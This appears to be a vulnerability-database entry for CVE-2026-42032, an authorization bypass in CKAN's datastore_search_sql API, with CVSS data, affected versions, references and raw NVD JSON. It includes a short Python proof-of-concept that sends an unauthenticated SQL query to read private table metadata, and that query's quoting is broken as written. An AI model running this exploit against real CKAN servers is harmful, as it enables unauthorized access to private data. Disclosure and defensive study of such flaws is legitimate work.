CVE-2026-42032

Description

CKAN is an open-source DMS (data management system) for powering data hubs and data portals. Prior to 2.10.10 and 2.11.5, a vulnerability in datastore_search_sql allowed attackers to bypass authorization in order to gain access to private resources and PostgreSQL system information This vulnerability is fixed in 2.10.10 and 2.11.5.

CVSS Details

CVSS Score

9.1

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:okfn:ckan:*:*:*:*:*:*:*:* - VULNERABLE

CKAN < 2.10.10

CKAN < 2.11.5

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import json

# Target URL (replace with actual vulnerable instance)
target_url = "http://localhost:5000/api/3/action/datastore_search_sql"

# The payload attempts to read a private table or system information
# Exploiting the authorization bypass in datastore_search_sql
payload = {
    "sql": "SELECT * FROM "_table_metadata";"
}

headers = {
    "Content-Type": "application/json"
}

try:
    # Send the request without authentication headers
    response = requests.post(target_url, data=json.dumps(payload), headers=headers)

    if response.status_code == 200:
        print("[+] Vulnerability exploited successfully!")
        print("[+] Response:")
        print(response.json())
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
        print(response.text)

except Exception as e:
    print(f"[-] An error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-42032
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-42032
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-42032/
[4] VulDB https://vuldb.com/cve/CVE-2026-42032
[5] https://github.com/ckan/ckan/security/advisories/GHSA-cg4x-64p3-x59h

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-42032", "sourceIdentifier": "[email protected]", "published": "2026-05-13T19:17:22.853", "lastModified": "2026-05-15T15:02:11.310", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "CKAN is an open-source DMS (data management system) for powering data hubs and data portals. Prior to 2.10.10 and 2.11.5, a vulnerability in datastore_search_sql allowed attackers to bypass authorization in order to gain access to private resources and PostgreSQL system information This vulnerability is fixed in 2.10.10 and 2.11.5."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "UNREPORTED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:okfn:ckan:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.10.10", "matchCriteriaId": "67854247-8130-4ED6-BFC0-3221AD5B7E7C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:okfn:ckan:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.11.0", "versionEndExcluding": "2.11.5", "matchCriteriaId": "A7DF9D70-4F27-4966-A66C-9E8147579BCA"}]}]}], "references": [{"url": "https://github.com/ckan/ckan/security/advisories/GHSA-cg4x-64p3-x59h", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}]}}